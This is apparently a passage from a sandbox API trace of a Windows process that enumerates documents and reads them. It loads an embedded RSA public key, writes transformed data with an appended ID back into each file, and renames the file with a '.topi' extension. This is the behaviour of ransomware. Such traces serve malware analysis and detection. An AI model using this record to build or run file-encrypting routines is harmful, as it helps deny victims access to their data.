Size=0x4) returned 0x316e9d8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.034] GetCurrentThreadId () returned 0x8c4 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9318 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f16e0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.036] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xd9cc, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xd9cc, lpOverlapped=0x0) returned 1 [0095.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.037] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd9d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.037] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.037] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.037] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.037] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.037] CloseHandle (hObject=0x6a8) returned 1 [0095.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.039] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J t2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j t2.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J t2.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j t2.docx.topi")) returned 1 [0095.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.040] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.041] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aac010, ftCreationTime.dwHighDateTime=0x1d5ac8a, ftLastAccessTime.dwLowDateTime=0xac374820, ftLastAccessTime.dwHighDateTime=0x1d58c64, ftLastWriteTime.dwLowDateTime=0xac374820, ftLastWriteTime.dwHighDateTime=0x1d58c64, nFileSizeHigh=0x0, nFileSizeLow=0x186b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jUfFVqR50da.pptx", cAlternateFileName="JUFFVQ~1.PPT")) returned 1 [0095.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.041] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jUfFVqR50da.pptx") returned=".pptx" [0095.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jUfFVqR50da.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\juffvqr50da.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.041] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=100025) returned 1 [0095.041] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.044] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18693, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.044] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.044] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.044] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x186b9, lpOverlapped=0x0) returned 1 [0095.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.045] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.046] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.046] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.046] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.046] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.046] GetLastError () returned 0x0 [0095.046] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.046] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.046] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.046] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.046] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x186c0) returned 0x9a06a00 [0095.047] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f16e0 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1728 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.047] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9318 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9300 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.048] 